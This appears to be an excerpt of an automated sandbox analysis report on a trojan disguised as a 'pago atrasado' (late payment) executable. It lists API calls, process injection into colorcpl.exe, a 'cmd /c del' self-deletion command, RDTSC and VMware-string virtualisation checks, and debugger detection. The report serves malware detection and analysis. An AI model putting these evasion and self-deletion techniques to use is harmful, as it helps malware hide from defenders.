          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009D841F
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A8D466
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009F2581
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A925DD
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009DD5E0
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A92D07
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009C0D20
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A91D55
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A92EF7
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_009E6E30
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A8D616
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A91FF1
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_1_00401030
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_1_0041D0F5
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_1_0041C0FC
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_1_0041B8B6
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_1_0041C985
          Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0454841F
          Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045F1002
          Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0454B090
          Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_045620A0
          Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04601D55
          Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0453F900
          Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04530D20
          Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04554120
          Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0454D5E0
          Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04562581
          Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04556E30
          Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_0456EBB0
          Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_02B1B8B6
          Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_02B1D0F5
          Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_02B1C985
          Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_02B1A6B6
          Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_02B02FB0
          Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_02B08C70
          Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_02B08C6B
          Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_02B02D90
          Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_02B1BD45
          Source: C:\Windows\SysWOW64\colorcpl.exe Code function: String function: 0453B150 appears 32 times
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: String function: 009CB150 appears 35 times
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_004185D0 NtCreateFile,
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00418680 NtReadFile,
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00418700 NtClose,
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_004187B0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_004185CA NtCreateFile,
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_0041867A NtReadFile,
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_004186FB NtClose,
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A098F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A099A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A095D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A096E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A097A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A098A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A0B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A099D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09A10 NtQuerySection,
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A0A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A095F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A0AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09560 NtWriteFile,
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A096D0 NtCreateKey,
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A0A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09760 NtOpenProcess,
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A09770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_2_00A0A770 NtOpenThread,
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_1_004185D0 NtCreateFile,
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_1_00418680 NtReadFile,
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_1_00418700 NtClose,
          Source: C:\Users\user\Desktop\pago atrasado.exe Code function: 1_1_004187B0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04579840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04579860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04579540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 16_2_04579910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045795D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045799A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045796D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045796E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0457B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045798F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045798A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579560 NtWriteFile,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0457AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045799D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045795F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0457A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0457A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_04579730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_0457A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_045797A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_02B18680 NtReadFile,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_02B187B0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_02B18700 NtClose,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_02B185D0 NtCreateFile,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_02B186FB NtClose,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_02B1867A NtReadFile,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 16_2_02B185CA NtCreateFile,
          Source: pago atrasado.exe, 00000000.00000003.244765966.000000000F1B6000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs pago atrasado.exe
          Source: pago atrasado.exe, 00000001.00000003.248962710.0000000000786000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs pago atrasado.exe
          Source: pago atrasado.exe, 00000001.00000002.327286991.0000000002973000.00000040.00020000.sdmpBinary or memory string: OriginalFilenamecolorcpl.exej% vs pago atrasado.exe
          Source: C:\Users\user\Desktop\pago atrasado.exeFile read: C:\Users\user\Desktop\pago atrasado.exeJump to behavior
          Source: pago atrasado.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\pago atrasado.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\pago atrasado.exe 'C:\Users\user\Desktop\pago atrasado.exe'
          Source: C:\Users\user\Desktop\pago atrasado.exeProcess created: C:\Users\user\Desktop\pago atrasado.exe 'C:\Users\user\Desktop\pago atrasado.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\SysWOW64\colorcpl.exe
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\pago atrasado.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\pago atrasado.exeProcess created: C:\Users\user\Desktop\pago atrasado.exe 'C:\Users\user\Desktop\pago atrasado.exe'
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\pago atrasado.exe'
          Source: C:\Users\user\Desktop\pago atrasado.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
          Source: C:\Users\user\Desktop\pago atrasado.exeFile created: C:\Users\user\AppData\Local\Temp\nsb7E27.tmpJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/2@12/5
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_00402053 CoCreateInstance,MultiByteToWideChar,
          Source: C:\Users\user\Desktop\pago atrasado.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\pago atrasado.exeCode function: 0_2_00404292 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5060:120:WilError_01
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Binary string: colorcpl.pdbGCTL source: pago atrasado.exe, 00000001.00000002.327276708.0000000002970000.00000040.00020000.sdmp
          Source: Binary string: colorcpl.pdb source: pago atrasado.exe, 00000001.00000002.327276708.0000000002970000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: pago atrasado.exe, 00000000.00000003.243423683.000000000F230000.00000004.00000001.sdmp, pago atrasado.exe, 00000001.00000003.248757919.0000000000670000.00000004.00000001.sdmp, colorcpl.exe, 00000010.00000002.516530503.000000000462F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: pago atrasado.exe, colorcpl.exe

          Data Obfuscation:

          Detected unpacking (changes PE section rights)
          Source: C:\Users\user\Desktop\pago atrasado.exe | Unpacked PE file: 1.2.pago atrasado.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 0_2_1000A4F5 push ecx; ret
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_0041B87C push eax; ret
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_0041B812 push eax; ret
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_0041B81B push eax; ret
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_0041C951 push FFFFFFA3h; ret
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_00404F18 push edi; retf
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_0041B7C5 push eax; ret
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_00A1D0D1 push ecx; ret
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_1_0041B87C push eax; ret
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_1_0041B812 push eax; ret
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_1_0041B81B push eax; ret
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_1_0041C951 push FFFFFFA3h; ret
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_0458D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_02B1B812 push eax; ret
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_02B1B81B push eax; ret
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_02B1B87C push eax; ret
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_02B1C951 push FFFFFFA3h; ret
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_02B1B7C5 push eax; ret
          Source: C:\Windows\SysWOW64\colorcpl.exe | Code function: 16_2_02B04F18 push edi; retf
          Source: C:\Users\user\Desktop\pago atrasado.exe | File created: C:\Users\user\AppData\Local\Temp\nsw7E57.tmp\xpbpx.dll

          Hooking and other Techniques for Hiding and Protection:

          Self deletion via cmd delete
          Source: C:\Windows\SysWOW64\colorcpl.exe | Process created: /c del 'C:\Users\user\Desktop\pago atrasado.exe'
          Source: C:\Windows\SysWOW64\colorcpl.exe | Process created: /c del 'C:\Users\user\Desktop\pago atrasado.exe'
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 0_2_10008826 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,
          Source: C:\Users\user\Desktop\pago atrasado.exe | Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\colorcpl.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\pago atrasado.exe | RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\pago atrasado.exe | RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\colorcpl.exe | RDTSC instruction interceptor: First address: 0000000002B08604 second address: 0000000002B0860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\colorcpl.exe | RDTSC instruction interceptor: First address: 0000000002B0898E second address: 0000000002B08994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\explorer.exe TID: 5660 | Thread sleep time: -30000s >= -30000s
          Source: C:\Windows\SysWOW64\colorcpl.exe TID: 5860 | Thread sleep time: -36000s >= -30000s
          Source: C:\Windows\explorer.exe | Last function: Thread delayed
          Source: C:\Windows\SysWOW64\colorcpl.exe | Last function: Thread delayed
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_004088C0 rdtsc
          Source: C:\Users\user\Desktop\pago atrasado.exe | Process information queried: ProcessInformation
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 0_2_00405E93 FindFirstFileA,FindClose,
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 0_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 0_2_00402671 FindFirstFileA,
          Source: explorer.exe, 00000002.00000000.275739014.000000000891C000.00000004.00000001.sdmp | Binary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000002.00000000.312138109.000000000113D000.00000004.00000020.sdmp | Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000000.275739014.000000000891C000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000000.312469410.00000000011B3000.00000004.00000020.sdmp | Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}qqqqqqqqqqqqqq
          Source: explorer.exe, 00000002.00000000.312469410.00000000011B3000.00000004.00000020.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: explorer.exe, 00000002.00000000.275782564.00000000089B5000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 00000002.00000000.315993694.00000000053C4000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 00000002.00000000.275782564.00000000089B5000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: explorer.exe, 00000002.00000000.290685274.0000000008BB0000.00000004.00000001.sdmp | Binary or memory string: Prod_VMware_SATA*6
          Source: explorer.exe, 00000002.00000000.276079077.0000000008BB0000.00000004.00000001.sdmp | Binary or memory string: AProd_VMware_SATA*6
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 0_2_1000CDA2 IsDebuggerPresent,
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 0_2_100093E8 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 0_2_100098B2 GetProcessHeap,
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_004088C0 rdtsc
          Source: C:\Users\user\Desktop\pago atrasado.exe | Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\colorcpl.exe | Process token adjusted: Debug
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 0_2_1001A402 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 0_2_1001A616 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 0_2_1001A6C7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 0_2_1001A706 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 0_2_1001A744 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_00A090AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009C9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009FF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009FF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009FF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_00A43884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_00A43884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009F20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\pago atrasado.exe | Code function: 1_2_009C58EC mov eax, dword ptr fs:[00000030h]
